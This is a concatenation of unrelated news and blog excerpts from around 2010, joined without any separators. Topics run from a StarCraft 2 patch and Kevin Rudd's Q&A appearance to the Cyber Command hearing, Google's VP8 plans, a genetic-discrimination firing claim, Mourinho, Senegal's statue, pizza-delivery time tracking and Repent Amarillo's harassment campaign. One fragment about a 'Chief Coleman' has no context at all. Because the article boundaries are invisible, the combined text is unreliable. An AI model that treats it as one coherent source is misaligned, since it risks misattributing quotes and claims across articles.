Well , it turned out the patch 9 was already ready for public consumption , as long as you knew how to get to the dinner table :)
So , after a few hours struggling to figure out what others had already done weeks before us , we got a hold of the patch , and applied it successfully .
For the curious :
Download the patch files .
One at a time , put them in Support\ within your install directory .
Rename the file to sc2-patch.mpq .
Run Blizzard Updater.exe .
Repeat for any file that is part of the patch .
( You 'll have to find the patch on your own , but if you pop on IRC we 'll gladly point you in the right direction )
Anyways , the Galaxy Editor seems to be a variant of WarCraft 3's WorldEdit .
It 's very similar , so if you 're familiar with that , you 'll feel right at home .
Right now it feels to be a very early draft , but will definitely make it possible to build terrain and edit various pieces of the maps that were just too complicated to do by hand .
It also has the ability to import maps from SC1 and WC3 , which is a nice bonus .
We will update the site with pictures and more information as it comes out :)
Radio Miraya host Lubna Lasu broadcasts the Betna Weekend Edition program on April 10 , 2010 in the southern Sudanese city of Juba .
The show focuses on the elections and women 's rights and is broadcast across South Sudan .
There were no televised debates , much less Twittering or blogging , as candidates sought to get their messages across to the people of south Sudan in an election campaign that wrapped up on April 9 .
Instead , it was mostly the transistor radio for the inhabitants of the dirt - poor semi-autonomous region , where most people are illiterate and few are wealthy enough or lucky enough even to have electricity for a television .
( AFP / Getty Images ) #
Monday should have been a good day for the Prime Minister .
It almost was .
Malcolm Turnbull was excoriating his own party 's fiscal recklessness .
Tony Abbott was in Queanbeyan , alienating yet more women as he pretended to iron a shirt .
And the ridiculousness of a week in which a loon - eyed Barnaby Joyce and a skirt - wearing Joe Hockey all but destroyed the Opposition 's economic credentials was still front of mind .
But then , a little after 9.30 pm , everything fell apart .
In just over an hour Kevin Rudd did more to alienate young voters than he has in more than two years of government .
That the longest televised interview with the Prime Minister since 2008 was conducted by a room full of teenagers should have been telling enough .
But in the space of three questions it collapsed into pointed fingers and condescension - proof of how Rudd has misjudged his relationship with young Australia .
Six minutes into Q&A on ABC TV , came the first question to unsettle the Prime Minister : '' Mr Rudd , I 'd like to know how you expect us to trust you . ''
What followed was one of the most painful hours of television this side of an Iain Hewitson cooking double .
'' Our generation are the ones that got behind you in the Kevin 07 and now you expect us to trust you on everything you 're saying .
And you broke promises like the laptops ones and the health ones and all the ones that are important to our generation . ''
U.S. military networks are seeing " hundreds of thousands of probes a day , " according to alarming new statistics revealed this morning by the Army general nominated to head the U.S. military 's new Cyber Command .
But beyond that scary headline , it 's not clear if the threat is what it 's cracked up to be .
In a Senate Armed Services Committee confirmation hearing today , Lt. Gen. Keith Alexander said the Pentagon was " alarmed by the increase , especially this year , " in the number of attempts by outsiders to scan military networks for potential weaknesses and vulnerabilities .
As Wired.com 's Threat Level has noted , that kind of language is certain to grab the attention of senators , and top policymakers .
But the reality is a bit more prosaic .
Those probes do n't necessarily translate into hostile action , Alexander added : " They may scan the network to see what kind of operating system you have to facilitate ... an attack . "
Still , the confirmation hearing for Alexander , who has been tapped to lead the Pentagon 's new Cyber Command is also shaping up as a fascinating discussion of the potential rules of engagement in cyberwarfare .
But it 's also likely to help drum up business for more scare - mongering government IT consultants .
Among other things , senators are discussing some of the hypothetical scenarios for how the U.S. military might respond if its networks – or civilian networks – came under online assault .
Sen. Carl Levin ( D - Michigan ) , the chairman of the committee , quizzed Alexander on how the military might respond if an adversary launched an attack through a neutral country – or through computers owned by U.S. entities .
Would the U.S. military have the authority to mount a defense , or stage a possible counterattack ?
Alexander said the command has established rules of engagement that spell out what it can do to defend its networks , where it can go and how it can block attacks .
It would rely on an " execute order " from the combatant commander ( i.e. , the four - star geographic commander ) to block an attack in an overseas theater .
A domestic attack , however , might complicate matters .
The hearing is also raising some important ( and very sticky ) legal issues , such as the extent to which the Department of Defense would have to step in to defend government civilian networks or private U.S. networks .
The general said the Department of Homeland Security would have the lead , but the military 's Cyber Command would have a supporting role .
However , the legal issues surrounding an attack that was routed through U.S. domestic entities , he conceded , would be " more complex " because of civil liberties and privacy issues .
[ Image : Senate Armed Services Committee ]
When Google announced a deal to acquire video technology company On2 last year , the move generated speculation that the search giant was aiming to liberate the VP8 codec in order to accelerate the advancement of standards - based open video .
Google has remained silent about its plans for On2's intellectual property , but signs have emerged that the company is planning to do precisely what the speculators anticipated .
According to a report at NewTeeVee , inside sources have confirmed that Google will be open - sourcing the VP8 codec next month at the Google I /O conference .
Mozilla and Google will also reportedly announce plans to implement support for VP8 in their respective browsers at that time .
The move could have profound ramifications on the viability of standards - based video playback and the future of rich media on the Internet .
The need for an open codec
HTML5 defines a new standards - based method for embedding video content in a webpage , but the standard does n't specify a codec .
The major browser vendors have n't been able to reach a consensus — some support the royalty - free Ogg Theora while others favor the technically superior H.264 format .
Although all parties broadly agree that a royalty - free codec would be beneficial , none of the existing royalty - free codecs deliver adequate compression quality to satisfy everyone .
Funding from Google and Mozilla has helped to improve Theora considerably , but it still does n't match H.264 .
Despite its profound efficiency , the downside of H.264 is that it is encumbered by patents and requires costly licensing fees that set a high barrier to entry .
The lack of an appropriate universal codec for the HTML5 video element has made it difficult for standards - based video to reach everyone .
Adopters are building implementations that only support specific browsers and environments .
Some major websites like Wikipedia are only supporting Theora and many of the companies that are trying to make their content accessible to Apple 's devices are exclusively supporting H.264 .
This conflict over codecs is the reason why Google 's acquisition of On2 generated substantial enthusiasm among open Web advocates .
On2 has a long history of leadership in the art of video encoding .
Theora itself is based on a very old variant of the company 's technology .
On2's current flagship codec is VP8 , which is said to be highly sophisticated and competitive with H.264 .
If Google were to open VP8 and make the underlying intellectual property available under royalty - free terms , it would end the HTML5 video impasse by supplying an ideal codec .
Browser vendors and Web developers have been eagerly waiting for Google to reveal what it plans to do with On2's codec technology .
NewTeeVee 's sources say that the wait will end next month when Google opens up VP8 during the Google I /O conference .
The Supreme Court heard arguments recently in a case out of California , in which a Christian student group at a public law school sued because they were denied recognition and funding by the school .
The reason for this denial is that the school requires student groups to be open to all members , and the Christian Legal Society wants to ban – you ’ll never see it coming – people who are guilty of “ unrepentant participation in or advocacy of a sexually immoral lifestyle ” .
That means gays and gays alone , of course , since being gay is the only sin that Christians care about now .
The Bible also prohibits divorce quite clearly [ Matthew 19:6 ] , but I ’ve heard no allegation that this group seeks to exclude people who are “ unrepentantly guilty ” of having gotten divorced .
Some of the arguments before the Supreme Court verged on the comic , such as this exchange :
“ Are you suggesting that if a group wanted to exclude all black people , all women , all handicapped persons , whatever other form of discrimination a group wants to practice , that a school has to accept that group and recognize it , give it funds and otherwise lend it space ? ” asked Justice Sonia Sotomayor .
No , McConnell said .
“ The stipulation is that they may not exclude based on status or beliefs .
We have only challenged the beliefs , not status .
Race , any other status basis , Hastings is able to enforce . ”
“ What if the belief is that African Americans are inferior ? ” Justice John Paul Stevens said .
“ Again , I think they can discriminate on the basis of belief , but not on the basis of status , ” McConnell said .
So apparently , a student group would not be able to outright bar black people , but would be able to bar black people who refuse to sign a sworn statement declaring their belief in the racial inferiority of black people .
Totally different !
Thanks for clearing that up .
The Christian group ’s lawsuit claimed that their constitutional rights of free association and free speech are being denied , which is an obvious falsehood .
No one ’s freedom of association is being denied ; the Christian group , or any other group , can select its membership based on any criteria they like .
The issue is whether the school , which as a public institution is an arm of the government , must subsidize that discrimination by giving official recognition and funding to such a group .
This question should have been settled long ago , but while the CLS is n’t seeking to overturn civil - rights laws , it obviously wants to carve out an exception permitting them to practice anti-gay bigotry with state support as long as it ’s founded on religious belief ( as if racism of past eras was not also justified with religion ) .
Sadly , this revolting argument is n’t an American aberration .
On the other side of the pond , Christian fundamentalists in the U.K. ( yes , they do exist ! ) are making exactly the same argument :
A top judge was warned that court rulings against Christian workers risk causing “ civil unrest ” as he heard the case of a relationship counsellor who was sacked after refusing to give sex advice to homosexual couples .
Gary McFarlane ’s barrister said that laws banning discrimination had taken precedence over religious freedoms .
… Christian leaders are particularly concerned by a ruling by Lord Neuberger , the Master of the Rolls on behalf of the Court of Appeal .
Lillian Ladele , a registrar who refused to conduct civil partnerships because they were against her beliefs , was deemed to have broken the law and could no longer work as a registrar .
They claim that the ruling meant that the right to express the Christian faith must take second place to the rights of homosexuals .
That last sentence could be more accurately written as follows :
“ They claim that the ruling meant that the right of Christians to be bigots must take second place to the rights of homosexuals to be free of bigotry . ”
After all this time , Christian fundamentalists are still committing the same fallacy I pointed out in one of my very first posts : the erroneous belief that their free exercise rights have been violated if they have n’t been accommodated in any way they demand .
They ’ve very successfully managed to remain ignorant of the fact that having freedom of religion means , if you have religious objections to performing the duties of a job , then you ’re free to not take that job .
There are plenty of positions where you ’re not required to serve the public , if these people find the idea of rendering service to a gay person so utterly unthinkable .
But no .
They seek the right not just to express their opinions as private citizens , but to carry those opinions over into the performance of their official duties and decide who they will or will not serve based on whom their religious beliefs tell them to hate .
What next ?
Christian doctors who wo n’t treat gay people because they believe God is punishing them with plagues ?
Christian firefighters who refuse to extinguish a burning house if a gay couple lives there ?
Christian policemen who refuse to arrest a person who assaults or murders a gay man ?
Where does it stop ?
What these loathsome fundamentalists really want is to make up their own laws based on their personal religious beliefs .
And once we allow them to do that in even one area – once we accept that religious beliefs ever trump the equal protection of the law – there ’s no consistent place where this principle should end .
The only rational thing to do is to draw the line right at the beginning , and declare that bigotry and hate are never valid reasons for treating people unequally – the same argument that ’s already accepted in the case of race and gender .
There ’s every reason to believe that the day is rapidly approaching when the Christians who seek to safeguard their own right to discriminate will be considered just as reprehensible as the bigots of past eras who fought equal rights for women and black people .
Pamela Fink Says She Was Fired After Getting a Double Mastectomy To Prevent Breast Cancer
Fink Says Her Doctors Told Her She Had an 80 Percent Chance of Getting Breast Cancer
A Connecticut woman claims she was fired despite years of glowing reports by her employer after she told them she had tested positive for the breast cancer gene and would undergo a double mastecomy as a preventative measure .
" I was a great employee and I did really great work , " said Pamela Fink , 39 .
" The only thing that changed from the time that I had a great review to when I did n't was my two surgeries . "
Fink has filed complaints at the Connecticut Commission on Human Rights and Opportunities as well as the federal Equal Employment Opportunity Commission alleging that she was fired from the Stamford , Conn. , company MXenergy because of her genetic testing results .
She is claiming that by doing so , her employer , MXenergy , a natural gas and electricity provider , violated the Genetic Information Nondiscriminaton
Act as well as the Americans with Disabilities Act .
Fink also says that her termination was in violation of the Genetic Information Nondiscrimination Act , which was enacted in November 2009 and prohibits discrimination on the basis of genetic information by employers or health insurers .
Fink 's doctor told her she had an " 80 percent " chance of getting breast cancer after determining she was a carrier of the breast cancer gene , also known as BRCA2 , so Fink elected to get a preventative double mastectomy .
" Basically I was a ticking time bomb , " said Fink .
" It was n't if , it was when I was going to get cancer . "
Fink underwent the double mastectomy on Oct. 9 , 2009 , taking two weeks of paid medical leave .
On Jan. 22 , 2010 , Fink had reconstructive surgery .
According to Fink , the day before her second surgery she received a review that was " negative and scathing . "
On March 25 , she was fired .
Messages left for MXenergy were not immediately returned , but company spokesman Todd Miller told The Associated Press that " MXenergy ' emphatically and categorically ' denies the allegations , but has a policy not to discuss personnel matters and will not comment further . "
In the complaint , Fink said that MXenergy said they fired her because her " position was terminated . "
But Fink claims that another woman was brought on to do her job and was later promoted as her superior while she was out on medical leave .
Fink Says Poor Reviews Happened Only After She Discovered She Had the Breast Cancer Gene
" It has been horrible , " Fink said of the ordeal .
Fink , who has a husband and two small children , had been the primary breadwinner for her family and had been the insurance provider .
MXenergy had employed Fink as the director of public relations and marketing communications since January 2006 , according to the complaint obtained by ABCNews.com .
In Fink 's 2009 performance review , her employers told her that she was doing an " exemplary job " and has been a " relentless crusader " for the brand .
During an August 2009 meeting about her review Fink said that her supervisor Gina Goldberg told her " that if she was to lay off everyone in the Marketing Department except one employee .
I would be the one employee she kept . "
Fink 's attorney , Gary Phelan , said that his client is hoping for reinstatement in her position at MXenergy and punitive and emotional distress damages .
Janice Goodman , a labor lawyer in New York City who is not associated with Fink 's case , said that people are fired because of disabilities or issues like these " more than we 'd like them to be . "
Fink Hopes Others Don't Hesitate to Get Tested In Fear Of Losing Their Jobs
With two sisters who are breast cancer survivors , Fink says that she hopes her case allows others to realize how important early detection is .
" The truth of the matter , nobody needs to die from the disease anymore .
We have really good detection and really good ways to get people better , " said Fink .
" The bigger picture is that the technology and science is just incredible in what it can determine . "
" If people are afraid to even have the genetic testing then how many lives are we going to lose because people just do n't want to rock the boat ? "
This is the Conservatives ' new campaign poster .
Not much of the big society message here and it is going down rather well on Conservative Home .
" It 's good to see the party getting specific about what ' change ' means , " blogs Tim Montgomery .
The first person in the comments is wildly enthusiastic : " Wow .
That 's a tough message .
I like it . "
The Spectator and New Statesman blogs are looking at the wider context , and what it means for Conservative party .
" You can expect plenty of handwringing about whether this message is too tough , or whether it represents the Tories shifting rightwards in the aftermath of the Lib Dem surge , " says Peter Hoskin in the Spectator .
George Eaton in the New Statesman see consequences of the party 's internal tensions being played out across poster sites across the country .
The change of tone is , he says , evidence that communications chief and former News of the World editor Andy Coulson has won out over the more optimistically - orientated strategy director Steve Hilton , a key supporter of Cameron 's big society .
This is one is certainly a lot tougher than what we have been used to seeing from the Tories of late .
Add your comments below .
Ten years ago this month Chelsea took a 3 - 1 lead to the Camp Nou in the knockout stages of the Champions League , only to have their European ambitions put into firm perspective by five Barcelona goals before a crowd of 100,000 , even if they did take the second leg into extra time .
At that time Barcelona were the third best team in Spain , at least on the evidence offered by Valencia knocking them out in the next round and going on to contest the final with Real Madrid .
As they have since improved to the tune of accumulating two European Cups , three La Liga titles and unofficial status as the planet 's favourite team , Internazionale 's 3 - 1 advantage from the first leg of this year 's semi-final does not quite entitle the Italians to begin booking hotels in Madrid .
Yet Inter can approach Wednesday 's away leg with confidence .
They have the hottest property in management in charge of their team , something Chelsea in 2000 had to wait another four years for Roman Abramovich to bring about .
If it is true that Abramovich 's main priority has always been to win the Champions League then he should be disappointed with José Mourinho and with himself in equal measure .
With the coach because , although he came close on a couple of occasions , Mourinho never managed to reach a European Cup final in his three years at Chelsea , despite a level of financial backing that was the envy of most of his rivals .
With himself because the team Mourinho had moulded did reach the final in the season Abramovich prematurely called time on his turbulent coach , and would have done so again the following year but for the most erratic display of refereeing the competition has ever witnessed .
It seems impossible to believe , in the light of the way Mourinho has transformed the perennial European underachievers he took over at San Siro , that a Champions League trophy would not now be sitting on Chelsea 's shelf had Abramovich not chosen to waver from his original bold but beautifully simple plan .
It may not appear to have been all that bold of Chelsea to buy up the dashing young manager who had just won the Champions League with unfancied Porto , though in 2004 , just before Mourinho cavalierly announced himself as the special one , it was not obvious he would be an instant success .
His Uefa Cup win the previous season was chiefly recalled for a dull final against Celtic .
Porto finished second behind Real Madrid in their Champions League group , though Mourinho did manage to get a good look at Didier Drogba when beating Marseille home and away .
The defeat of Manchester United that pushed Mourinho unblinking into the spotlight owed everything to a Tim Howard fumble and a legitimate Paul Scholes goal that was incorrectly disallowed , while , thanks in part to excessive tinkering by Claudio Ranieri in Chelsea 's semi-final first leg , Porto only had to beat the similarly unheralded Monaco in the eventual final .
The point is that Mourinho was not then the best coach in the business .
He may certainly have been the sharpest , swankiest and most entertaining , but he still had something to prove in a bigger league with a bigger budget .
By bringing Chelsea two league titles in his first two seasons he proved it , and Abramovich should have noted that and found a way of putting up with the background noise .
Because if Inter hold on to their advantage and Mourinho takes a second team into a Champions League final , even the possibility of Louis van Gaal staking a similar claim to immortality the previous evening will not disguise the fact that Chelsea had the top man at the peak of his career and blundered by letting him go .
Mourinho's age alone makes him an attractive proposition for leading European clubs looking for longevity , not that many of them actually seem to be .
At 47 Mourinho could easily enjoy another decade or longer at the top .
When Chelsea got him he was three years younger than Sir Alex Ferguson when he joined Manchester United , and he rewarded them with instant success .
Now it looks as though Mourinho could eventually succeed Ferguson at Old Trafford , and Chelsea would only have themselves to blame .
They may have to plead with him to return to Stamford Bridge to avoid that embarrassment , although , given United 's financial uncertainty and Manchester City's as yet unsecured Champions League status , a stay at Real Madrid still appears a stronger possibility .
Successful or not , Mourinho could not have made it any plainer that he does not feel at home in Italy .
So the scene is set for football 's showiest character to make more showy history .
Should Inter conquer Barcelona and whoever they meet in Madrid , two sizeable ifs , Mourinho will not be the first coach to win the European Cup with two different clubs .
Ernst Happel and Ottmar Hitzfeld have done that .
Mourinho might , just might , become the first manager to win a second Champions League medal with a second club and walk away without a second glance .
Dumb and dumber drive us crazy
It is no secret that footballers are not always the sharpest tools in the box , and neither is it news that people have been paying other individuals to take driving tests on their behalf .
The two groups should never meet , however , because the driving test scam relies on anonymity and footballers are famous .
It would be stretching it a bit to describe Charles N'Zogbia as a household name , his previous manager famously referred to him as Insomnia , yet it takes a special sort of doziness to attempt to dupe a test centre when your picture has just been on every back page and television round - up for scoring a last - gasp winner against Arsenal .
At least the Wigan player 's arrest provided a few chuckles ( oh , come on , he can afford a fine and if he gets convicted and banged up he will have plenty of time to spend with the Highway Code ) in a week when Manchester City began gearing up for another summer of sledgehammer spending .
Clearly they can afford to make Liverpool an offer they cannot refuse for Fernando Torres , and probably will .
According to Roberto Mancini , they do n't want too many " normal " players at the club .
Fine .
Just as long as City understand that talking in that manner will leave most neutrals looking for a new second - favourite team to adopt .
Maybe one that does n't have a problem with normal .
( CNN ) -- Senegal on Saturday unveiled a colossal statue during a lavish ceremony amid reports of criticism over the monument 's construction at a time when the western African nation is struggling financially .
The 164 - foot structure -- about a foot taller than the Statue of Liberty -- shows the figures of a man , a woman and a child , arms outstretched , facing the Atlantic Ocean .
President Abdoulaye
Wade says the statue , which he designed , is a monument to Africa 's renaissance .
Critics say the opulent copper structure is merely the product of the president 's own self - indulgent vision and poor governance .
And though it dominates the skyline of Senegal 's capital , Dakar , the monument falls far short of the president 's claim that it is the world 's largest .
Several other statues are listed by multiple sources to be taller , including China 's Spring Temple Buddha , which stands just under 420 feet .
Opposition group Benno Siggil Senegal called on the Senegalese people to " refuse to associate themselves with a fraudulent scheme designed to satisfy the fantasies of Abdoulaye Wade and to lay the foundations of dynastic reign of Wade on our country , " according to the African Press Agency .
A spokeswoman for the president sought to downplay criticism Saturday , saying the statue -- valued at roughly $ 20 million -- was made possible by a land deal between Wade and North Korea , and that proceeds from the monument will benefit Senegalese children .
The statue is " an affirmation to be proud of Africa -- to be proud to be black , " said spokeswoman Gia Abrassart .
Other dignitaries in attendance at Saturday 's ceremony , which coincided with the 50th anniversary of Senegal 's independence , echoed that message .
" This renaissance statue is a powerful idea from a powerful mind , " said the Rev. Jesse Jackson in remarks to the crowd of hundreds waving flags at the foot of the lighted monument .
" This is dedicated to the journey of our ancestors , enslaved but not slaves . "
Malawi President Bingu Wa Mutharika praised Wade for constructing a monument that represents Africa .
" This monument does not belong to Senegal , " he said .
" It belongs to the African people wherever we are . "
North Korea , which made the statue 's construction possible , also sent Wade a congratulatory message , the state - run Korean Central News Agency reported .
In exchange for the money to build the statue , North Korea received a piece of Senegalese land , Abrassart said .
The message from top North Korean official Kim Yong Nam " expressed belief that the friendly and cooperative relations between the two countries would grow stronger in various fields in the future , too , " according to KCNA .
CNN 's Sarah Aarthun contributed to this report .
How much time do I really spend driving during any given shift ?
How much time do I spend folding boxes ?
What is my average hourly rate per shift ?
On a delivery by delivery basis ?
How much better is it to take a triple instead of a double delivery ?
How much does a zero tip affect my effective hourly rate ?
I often have questions like this , and the best way I could think of answering them was to track my every movement during a shift , so for three peak shifts ( Friday or Saturday night ) I recorded everything I was doing , from my clock - out time to the time I spent folding boxes ( sometimes I feel like I do nothing but fold boxes , though as you 'll see , the data says otherwise ) .
Over the next few weeks I 'm going to take that data and see what sort of useful information I can pull from it .
Here 's an example of my raw data ( you can view the full raw data here ) :
5:28 : arrive
5:31 : clock in
5:33 –5:45 : fold boxes ( 12 minutes )
5:45 –5:48 : work ovens ( 3 minutes )
5:48 : routed
5:50 : leave on delivery ( 11 minutes travel time )
6:01 : arrive at delivery ( $ 3 tip )
6:01 : leave house ( 11 minutes travel time )
6:12 : Arrive at store ( 24 minutes run time for 1 delivery )
6:12 –6:15 : work ovens ( 3 minutes )
6:15 : routed
6:18 : leave on delivery ( 15 minutes travel time )
6:33 : arrive at house ( $ 3 tip )
6:35 : leave house ( 3 minutes travel time )
6:38 : arrive at second delivery ( $ 2 tip )
6:38 : leave house ( 14 minutes travel time )
6:52 : arrive at store ( 37 minutes run time on two deliveries )
6:52 –7:02 : work ovens ( 10 minutes )
I took that data and went crazy with a spreadsheet to figure out both the percentage of time I spent doing various tasks as well as the average hourly rate I made on each delivery as well as on the shift as a whole .
Before I start analyzing I want to give a few caveats :
A few of the times are estimates .
I would probably get yelled at a bit if I was pulling out my phone every time they asked me to come work the ovens so that I could record the time .
I did however try to check the time and remember it for when I could record it .
For hourly wage estimates I 'm excluding the $ 1.29 per delivery gas / maintenance reimbursement that I get .
Just to be clear , I get $ 7.50 / hr while not clocked out on a run and $ 4.95 / hr while I am clocked out on a run .
These results are likely to be significantly different for weeknight shifts and drivers who are on a different pay - scheme than I am .
It 's also a very limited data - set , so it may not be completely representative of typical shifts ( though they certainly felt typical .
I consider a shift to be successful if I make at least $ 12.50 an hour .
I chose this number because it is what I made at my primary job when I started delivering pizza and , since I could n't get extra hours there , a second job would be worth my time if I could net the same wage .
I 've shopped it around with a few other delivery people and the consensus seems to me that it's a reasonable goal ( when excluding gas reimbursement ) .
I 'm not a statistician .
I took a class in college for statistics , but that 's about it , and I mostly learned that data can be made to say whatever you want .
I 'm definitely open to improving my method if you find that I 'm doing something wrong or that I 'm not taking into account some variable is completely skewing my results .
Next week I 'll go into more of a breakdown of each shift ( and have a neat pie chart ! ) , but in the meantime , to answer the first question I posed , " How much time do I really spend driving during any given shift ? " :
Over three shifts I spent 67 % of my shift driving .
All products linked here have been independently selected by our editors .
We may earn a commission on purchases , as described in our affiliate policy .
Trying to diagnose computer issues remotely is really hard unless you can see what 's actually going on .
The next time someone needs your help with their computer , point them to ShowMeWhatsWrong and have them take a quick screencast .
Advertisement
This genius little webapp is very simple to use .
Head to the site , enter your name and email address , and the app will generate a unique URL you can pass on to the person you 're trying to help .
When they click the URL , all they need to do is click " Start Recording " and the app will automatically take a screencast of their computer for as long as five minutes — though you can stop the action at any point along the way .
The app also picks up the user 's voice through the built - in or connected mic , so the person you 're trying to help can talk as they walk you through the problems they 're having .
Click stop and the app automatically packages and uploads the video to its server , then sends you an email letting you know it 's there .
You 've got seven days to view it before it expires .
Advertisement
We 've always liked previously mentioned CrossLoop for remote support , but what sets this app apart from other tools is the sheer simplicity of it .
It 's a foolproof way for even the most novice computer user to capture and send a video of what 's going wrong on their system , and they do n't have to install anything .
Check out the video and see for yourself how easy it is to take and share a screencast with ShowMeWhatsWrong .
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
ShowMeWhatsWrong
Chief Coleman said several suspects faced criminal charges but not the boy , who is too young .
She said he could not have understood what he was doing and was simply copying the behaviour of people close to him .
Back in January , we made a passing mention of a group that was urging a boycott of Houston , Texas due to the election of its openly lesbian Mayor Annise Parker .
The group behind the boycott is called Repent Amarillo , a militant right - wing group that has been actively targeting those in considers to be engaged in sin for months , beginning with a small group of local swingers , as The Texas Observer reports :
A little over a year ago , Amarillo ’s swingers geared up for their New Year ’s Eve party at Route 66 Party and Event Rental , a downtown business owned by a prominent couple , Mac and Monica Mead .
Few in this conservative , church - heavy city knew about the weekend parties , and the swingers liked it that way .
“ Everybody in the lifestyle has to be very , very discreet , ” says Mac , a leather - skinned truck driver with a shaved head , piercing blue eyes and an earring .
The Meads enforced strict rules at the members - only club : no drugs , no single men , no audio - visual equipment .
Most couples , even ones who had been in “ the lifestyle ” for years , are on a first - name basis only .
The location of the club is ( or was ) “ to be kept strictly private . ”
So imagine the swingers ’ surprise when they arrived at their New Year ’s Eve bash to find two dozen protesters , local media in tow , holding signs and singing songs .
This was a most unwelcome coming - out party .
Some protesters , mostly young men in their teens and earrely 20s , wore black hoodies and military fatigues .
The men , Amarillo would soon learn , were foot soldiers of Repent Amarillo , a new , militant evangelical group that advertises itself as “ the Special Forces of spiritual warfare . ”
Their leader , David Grisham , a security guard at nuclear - bomb facility Pantex who moonlights as a pastor , explained the action .
“ We ’re here to shine the light on this darkness , ” Grisham told the be .
“ I do n’t think Amarillo knew about this place .
This is adultery .
This is wrong .
There ’s no telling how many venereal diseases get spread , how many abortions . ”
The goal , Grisham says , was not just to save the swingers ’ souls , but to shut the club down .
…
Perhaps the most insidious tactic Repent uses is trying to destroy the reputation of the swingers .
In Amarillo , people can be ostracized over a whiff of impropriety .
On one tape , Grisham directs followers to get the license - plate numbers in the Route 66 parking lot .
“ A new couple can be here three or four hours , ” says Mac .
“ Whenever they leave , the Repent Amarillo group will call them by first and last name , know where they live , know where they work , just within a very few hours . ”
Randall Sammons says he was fired from his job of 13 years in August after his boss learned Sammons was a swinger from another employee , a Repent member .
He believes he ’s now as good as blacklisted in Amarillo .
“ I ’m screwed at finding a job , ” Sammons says .
Russell Grisham , David ’s 20 - year - old son who has a conviction on his record for hacking the computer system at his high school , has posted the names , photos and workplaces of swingers on the Internet , including one man whose wife works for a school district .
( “ Family - wise , it will kill both of us , ” the man says . )
In at least two instances , Repent members called swingers ’ employers .
Thanks to Repent ’s constant harrassment , the swingers club is now up for sale … and so Repent Amarillo is branching out :
What ’s next for Repent ?
They ’ve posted a “ Warfare Map ” on the group ’s Web site .
The map includes establishments like gay bars , strip clubs and porn shops , but also the Wildcat Bluff Nature Center .
Repent believes the 600 - acre prairie park ’s Walmart - funded “ Earth Circle , ” used for lectures , is a Mecca for witches and pagans .
Also on the list are the 806 coffeehouse ( a hangout for artists and counterculture types ) , the Islamic Center of Amarillo ( “ Allah is a false god ” ) , and “ compromised churches ” like Polk Street Methodist ( gay- friendly ) .
And to demonstrate just how militant the organization is , consider the fact that they literally consider themselves to be soldiers in an “ Army of God “ :
I am a soldier in the army of my God .
The Lord Jesus Christ is my Commanding Officer .
The Holy Bible is my code of conduct .
Faith , Prayer , and the Word are my weapons of warfare .
I have been taught by the Holy Spirit , trained by experience , tried by adversity , and tested by fire .
I am a volunteer in this army , and I am enlisted for eternity .
I will either retire in this army at the Rapture or I will die in this army .
But I will not get out , sell out , be talked out or pushed out .
I am faithful , reliable , capable and dependable .
If my God needs me , I am there .
If He needs me in the Sunday School , to teach the children , work with the youth , help adults or just sit and learn , He can use me because I am there !
I am a soldier .
I am not a baby .
I do not need to be pampered , petted , primed up , pumped up , picked up , or pepped up .
I am a soldier .
No one has to call me , remind me , write me , visit me , entice me or lure me .
I am a soldier .
I am not a wimp .
I am in place , saluting my King , obeying His orders , praising His name and building His kingdom !
No one has to send me flowers , gifts , food , cards or candy or give me handouts .
I do not need to be cuddled , cradled , cared for or catered to .
I am committed .
I cannot have my feelings hurt bad enough to turn me around .
I can not be discouraged enough to turn me aside .
I can not lose enough to cause me to quit .
When Jesus called me into this army , I had nothing .
If I end up with nothing I will still come out ahead .
I will win .
My God has and will continue to supply all my needs .
I am more than a conqueror .
I will always triumph .
I can do all things through Christ .
The devil cannot defeat me .
People cannot disillusion me .
Weather cannot weary me .
Sickness cannot stop me .
Battles can not beat me .
Money can not buy me .
Governments cannot silence me , and hell cannot handle me .
I am a soldier .
Even death cannot destroy me .
For when my Commanding officer calls me from His battlefield , He will promote me to captain and then allow me to rule with Him .
I am a soldier in this army , and I ’m marching claiming victory .
I will not give up .
I will not turn around .
I am a soldier , marching Heavenbound .
Here I stand !
Will you stand with me ?
You can see Repent Amarillo ’s “ spiritual warfare map ” here .
KEVIN RUDD says the great moral challenge posed by climate change is undiminished and he will keep trying to implement an emissions trading scheme if Labor is re-elected .
In an interview with the Herald , Mr Rudd rejected growing criticism that he had abandoned the climate change cause because it was no longer a vote winner after the Copenhagen conference and the defeat of his emissions trading scheme .
" It 's very clear cut that whether climate change is topical or not , whether it is popular or not , the reality of it does not disappear , " he said .
" This remains a fundamental economic , environmental and moral challenge .
Whether it 's newsworthy or not in a particular season is beside the point .
We have n't changed our view of this . ''
The Senate has twice blocked legislation for the emissions trading scheme .
The legislation is again before the Parliament but the Senate has delayed debate until at least next month and there is next to no chance there will be a vote before the election expected in the spring .
By Jane O'Brien
BBC News , Washington DC
What can lists tells us about the personality of the list - maker ?
An exhibition in Washington reveals the obsessive and controlling sides of some of the world 's greatest artists .
Design genius Eero Saarinen 's to - do list included changing light bulbs
There are several stages to writing a list .
First there is the gentle thrill of anticipation as I contemplate the pristine paper in front of me .
I may not yet have a subject for my list , but just the thought of one gives me a sense of purpose .
Second there is the light - headed buzz that gradually develops into bliss , euphoria and an all - consuming calm .
Third comes the extraordinary sense of satisfaction from having created a rigid timetable of impossible tasks that has taken a disproportionate amount of time and thought .
It does n't matter that I will never look at it again .
Psychologists say that obsessive compulsive list makers ( I guess that includes me ) are trying to create an illusion of control in otherwise chaotic lives .
I see nothing wrong with that .
In the words of the American abstract artist , Charles Green Shaw : " Real happiness consists in not what we actually accomplish , but what we think we accomplish . "
Adolf Konrad 's packing list .
( Archives Of American Art )
To Do : See lists by Picasso , Bluemner and Saarinen
He is one of the artists featured in an exhibition currently running at the Archives of American Art in Washington .
It is a taxonomist 's dream : hundreds of lists drawn up by some of the world 's greatest modern artists .
Some are scribbled on scraps of paper , while others are elaborately illustrated .
There are lists of ideas , lists of instructions , lists of ambitions , of biographical details , of paintings , of things to do , of colours .
One artist , Benson Bond Moore , has even made an illustrated list of duck poses .
Here is inspiration indeed .
Liza Kirwin , the Archives ' curator of manuscripts says lists can be very revealing : " This very mundane and ubiquitous form of documentation can tell you a great deal about somebody 's personal biography , where they 've been and where they 're going , " she explains .
" People can relate to this form of documentation because so many people are list keepers and organise their lives this way , " she says .
Ordering chaos Highlights of the exhibition include : Picasso's handwritten list of recommended artists for the historic 1913 Armory Show - the first international exhibition of modern art in the United States .
He could not spell the name of one of his most famous contemporaries , Marcel Duchamp .
Adolf Konrad 's packing list made up of illustrations of art materials and clothes he wanted to take to Rome and Egypt in 1962 .
He draws himself wearing nothing but his underwear .
